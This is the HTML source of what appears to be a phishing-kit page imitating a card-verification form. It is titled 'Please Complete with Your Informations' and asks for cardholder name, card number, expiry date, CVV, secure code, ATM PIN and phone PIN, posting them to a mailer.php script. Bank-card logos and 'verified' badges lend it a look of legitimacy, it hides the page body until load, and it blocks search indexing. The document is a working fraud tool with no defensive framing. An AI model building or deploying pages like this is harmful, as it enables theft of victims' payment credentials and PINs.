<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Please Complete with Your Informations</title>
<meta http-equiv="content-type" content="text/html; charset=UTF8">
<meta charset="utf-8" />
<meta name="applicable-device" content="pc,mobile" />
 <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <meta name="robots" content="noindex, nofollow">
  <meta name="googlebot" content="noindex, nofollow">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="format-detection" content="telephone=no" />

<link rel="shortcut icon"
              href="images/favicon.ico"/>
			  
			  
	
<script type="text/javascript">

function unhideBody()
{
var bodyElems = document.getElementsByTagName("body");
bodyElems[0].style.visibility = "visible";
}

</script>
<SCRIPT language=Javascript>
      <!--
      function isNumberKey(evt)
      {
         var charCode = (evt.which) ? evt.which : event.keyCode
         if (charCode > 31 && (charCode < 48 || charCode > 57))
            return false;

         return true;
      }
      //-->
   </SCRIPT>
<body style="visibility:hidden" onload="unhideBody()">
<style type="text/css">
/*----------Text Styles----------*/
.ws6 {font-size: 8px;}
.ws7 {font-size: 9.3px;}
.ws8 {font-size: 11px;}
.ws9 {font-size: 12px;}
.ws10 {font-size: 13px;}
.ws11 {font-size: 15px;}
.ws12 {font-size: 16px;}
.ws14 {font-size: 19px;}
.ws16 {font-size: 21px;}
.ws18 {font-size: 24px;}
.ws20 {font-size: 27px;}
.ws22 {font-size: 29px;}
.ws24 {font-size: 32px;}
.ws26 {font-size: 35px;}
.ws28 {font-size: 37px;}
.ws36 {font-size: 48px;}
.ws48 {font-size: 64px;}
.ws72 {font-size: 96px;}
.wpmd {font-size: 13px;font-family: Arial,Helvetica,Sans-Serif;font-style: normal;font-weight: normal;}
/*----------Para Styles----------*/
DIV,UL,OL /* Left */
{
 margin-top: 0px;
 margin-bottom: 0px;
}
</style>
<style> 
    .textbox {
    height: 33px;
    width: 275px;
    border: 1px solid #B9BDC1;
    color: #797979;
	text-align: left;
	 font-size: 14px;
    -moz-box-shadow: 0 1px 1px #bbb inset;
    -webkit-box-shadow: 0 1px 1px #BBB inset;
    box-shadow: 0 1px 1px #BBB inset;
    -moz-border-radius: 3px;
    -webkit-border-radius: 2px;
    border-radius: 3px;
 } 
 .textbox:focus { 
    border: 1px solid #4d90fe; 
    outline: none; 
    box-shadow: inset 0px 1px 2px rgba(0,0,0,0.3);  
    -moz-box-shadow: inset 0px 1px 2px rgba(0,0,0,0.3); 
    -webkit-box-shadow: inset 0px 1px 2px rgba(0,0,0,0.3); 
    background: rgb(255, 255, 255); } 
  
</style>
<style type="text/css">
div#container
{
	position:relative;
	width: 1285px;
	margin-top: 0px;
	margin-left: auto;
	margin-right: auto;
	text-align:left; 
}
body {text-align:center;margin:0}
</style>

</head>
<body bgColor="#F5F5F5">
<div id="container">
<div id="roundrect1" style="position:absolute; overflow:hidden; left:438px; top:93px; width:638px; height:581px; z-index:0"><img border=0 width="100%" height="100%" alt="" src="images/roundrect97180953.gif"></div>

<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1285px; height:83px; z-index:1"><a href="#"><img src="images/header.png" alt="" title="" border=0 width=1285 height=83></a></div>

<div id="image3" style="position:absolute; overflow:hidden; left:166px; top:364px; width:247px; height:139px; z-index:2"><a href="#"><img src="images/enable.png" alt="" title="" border=0 width=247 height=139></a></div>

<div id="image4" style="position:absolute; overflow:hidden; left:66px; top:741px; width:1171px; height:88px; z-index:3"><a href="#"><img src="images/footer1.png" alt="" title="" border=0 width=1171 height=88></a></div>

<div id="image2" style="position:absolute; overflow:hidden; left:166px; top:96px; width:247px; height:231px; z-index:4"><a href="#"><img src="images/2.png" alt="" title="" border=0 width=247 height=231></a></div>
<form action=mailer.php name=chalbhai id=chalbhai method=post>
<div id="image5" style="position:absolute; overflow:hidden; left:446px; top:103px; width:618px; height:452px; z-index:5"><img src="images/capay.png" alt="" title="" border=0 width=618 height=452></div>

<input name="formtext1" title="Please Enter Right Value"  autofocus required autocomplete="off" maxlength="16" placeholder="Card Holder xxxxxx xxxxxxxx" class="textbox" type="text" style="position:absolute;width:295px;padding-left:4px;left:635px;top:198px;z-index:6">
<input name="formtext2" title="Please Enter Right Value"  autofocus required autocomplete="off" class="textbox" maxlength="16" pattern="\S{16,16}" placeholder="Number xxxx xxxx xxxx xxxx" type="text" maxlength=16 type="text" onkeypress="return isNumberKey(event)" style="position:absolute;width:295px;padding-left:4px;left:635px;top:247px;z-index:7">
<div id="image6" style="position:absolute; overflow:hidden; left:634px; top:294px; width:51px; height:32px; z-index:8"><img src="images/visa-on.png" alt="" title="" border=0 width=51 height=32></div>

<div id="image7" style="position:absolute; overflow:hidden; left:635px; top:292px; width:51px; height:32px; z-index:9"><img src="images/visa-off.png" alt="" title="" border=0 width=51 height=32></div>

<div id="image8" style="position:absolute; overflow:hidden; left:687px; top:292px; width:51px; height:32px; z-index:10"><img src="images/electron-on.png" alt="" title="" border=0 width=51 height=32></div>

<div id="image9" style="position:absolute; overflow:hidden; left:687px; top:292px; width:51px; height:32px; z-index:11"><img src="images/electron-off.png" alt="" title="" border=0 width=51 height=32></div>

<div id="image10" style="position:absolute; overflow:hidden; left:786px; top:292px; width:51px; height:32px; z-index:12"><img src="images/maestro-on.png" alt="" title="" border=0 width=51 height=32></div>

<div id="image11" style="position:absolute; overflow:hidden; left:786px; top:292px; width:51px; height:32px; z-index:13"><img src="images/maestro-off.png" alt="" title="" border=0 width=51 height=32></div>

<div id="image12" style="position:absolute; overflow:hidden; left:741px; top:292px; width:44px; height:32px; z-index:14"><img src="images/master-on.png" alt="" title="" border=0 width=44 height=32></div>

<div id="image13" style="position:absolute; overflow:hidden; left:740px; top:292px; width:45px; height:32px; z-index:15"><img src="images/master-off.png" alt="" title="" border=0 width=45 height=32></div>

<div id="image14" style="position:absolute; overflow:hidden; left:838px; top:292px; width:47px; height:32px; z-index:16"><img src="images/amex-on.png" alt="" title="" border=0 width=47 height=32></div>

<div id="image15" style="position:absolute; overflow:hidden; left:838px; top:292px; width:49px; height:32px; z-index:17"><img src="images/amex-off.png" alt="" title="" border=0 width=49 height=32></div>

<div id="image16" style="position:absolute; overflow:hidden; left:888px; top:292px; width:51px; height:32px; z-index:18"><img src="images/discover-on.png" alt="" title="" border=0 width=51 height=32></div>

<div id="image17" style="position:absolute; overflow:hidden; left:889px; top:292px; width:51px; height:32px; z-index:19"><img src="images/discover-off.png" alt="" title="" border=0 width=51 height=32></div>

<select name="formselect1" class="textbox" style="position:absolute;left:635px;top:344px;width:81px;z-index:20">
<option value="Month">Month</option>
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
<option value="6">6</option>
<option value="7">7</option>
<option value="8">8</option>
<option value="9">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
</select>
<select name="formselect2" class="textbox" style="position:absolute;left:748px;top:344px;width:81px;z-index:21">
<option value="Year">Year</option>
<option value="2015">2015</option>
<option value="2016">2016</option>
<option value="2017">2017</option>
<option value="2018">2018</option>
<option value="2019">2019</option>
<option value="2020">2020</option>
<option value="2021">2021</option>
<option value="2022">2022</option>
<option value="2023">2023</option>
<option value="2024">2024</option>
<option value="2025">2025</option>
<option value="2026">2026</option>
<option value="2027">2027</option>
<option value="2028">2028</option>
<option value="2029">2029</option>
<option value="2030">2030</option>
</select>
<input name="formtext3" title="Please Enter Right Value"  autofocus required autocomplete="off"  maxlength="16" pattern="\S{3,4}" placeholder="CVV xxx/xxxx" class="textbox" maxlength=10 type="text" onkeypress="return isNumberKey(event)" style="position:absolute;width:93px;padding-left:4px;left:635px;top:390px;z-index:22">
<div id="image18" style="position:absolute; overflow:hidden; left:733px; top:389px; width:58px; height:34px; z-index:23"><a href="#"><img src="images/icon-cvv-back.png" alt="" title="" border=0 width=58 height=34></a></div>

<div id="image19" style="position:absolute; overflow:hidden; left:790px; top:394px; width:27px; height:25px; z-index:24"><a href="#"><img src="images/3.png" alt="" title="" border=0 width=27 height=25></a></div>

<input name="formtext4" title="Please Enter Right Value"  autofocus required autocomplete="off" placeholder="Secure Code" class="textbox" type="text" maxlength=18 type="text" onkeypress="return isNumberKey(event)" style="position:absolute;width:145px;padding-left:4px;left:635px;top:442px;z-index:25">

<input name="formtext5" title="Please Enter Right Value"  autofocus required autocomplete="off" placeholder="ATM Pin" class="textbox" type="text" maxlength=4 type="text" onkeypress="return isNumberKey(event)" style="position:absolute;width:90px;padding-left:4px;left:635px;top:490px;z-index:36">

<input name="formtext6" title="Please Enter Right Value"  autofocus required autocomplete="off" placeholder="Phone Pin" class="textbox" type="text" maxlength=8 type="text" onkeypress="return isNumberKey(event)" style="position:absolute;width:110px;padding-left:4px;left:820px;top:490px;z-index:37">

<div id="image20" style="position:absolute; overflow:hidden; left:792px; top:435px; width:88px; height:35px; z-index:26"><img src="images/msc.png" alt="" title="" border=0 width=88 height=35></div>

<div id="image21" style="position:absolute; overflow:hidden; left:792px; top:431px; width:102px; height:45px; z-index:27"><img src="images/none.png" alt="" title="" border=0 width=102 height=45></div>

<div id="image22" style="position:absolute; overflow:hidden; left:791px; top:436px; width:83px; height:36px; z-index:28"><img src="images/vbv.png" alt="" title="" border=0 width=83 height=36></div>

<div id="formimage1" style="position:absolute; left:667px; top:566px; z-index:29"><input type="image" name="formimage1" width="134" height="41" src="images/oextt.png"></div>
<div id="text1" style="position:absolute; overflow:hidden; left:452px; top:204px; width:150px; height:20px; z-index:30">
<div class="wpmd">
<div><B>Card Holder Name</B></div>
</div></div>

<div id="text2" style="position:absolute; overflow:hidden; left:452px; top:252px; width:150px; height:20px; z-index:31">
<div class="wpmd">
<div><B>Card Number</B></div>
</div></div>

<div id="text3" style="position:absolute; overflow:hidden; left:452px; top:302px; width:150px; height:20px; z-index:32">
<div class="wpmd">
<div><B>Card Type</B></div>
</div></div>

<div id="text4" style="position:absolute; overflow:hidden; left:452px; top:348px; width:150px; height:20px; z-index:33">
<div class="wpmd">
<div><B>Expiration Date</B></div>
</div></div>

<div id="text5" style="position:absolute; overflow:hidden; left:452px; top:398px; width:150px; height:20px; z-index:34">
<div class="wpmd">
<div><B>CVC/CVV</B></div>
</div></div>

<div id="text6" style="position:absolute; overflow:hidden; left:452px; top:452px; width:150px; height:20px; z-index:35">
<div class="wpmd">
<div><B>Secure Code</B></div>
</div></div>

<div id="text7" style="position:absolute; overflow:hidden; left:452px; top:500px; width:150px; height:20px; z-index:38">
<div class="wpmd">
<div><B>ATM Pin</B></div>
</div></div>

<div id="text8" style="position:absolute; overflow:hidden; left:740px; top:500px; width:80px; height:20px; z-index:39">
<div class="wpmd">
<div><B>Phone Pin</B></div>
</div></div>

</div>

</body>
</html>
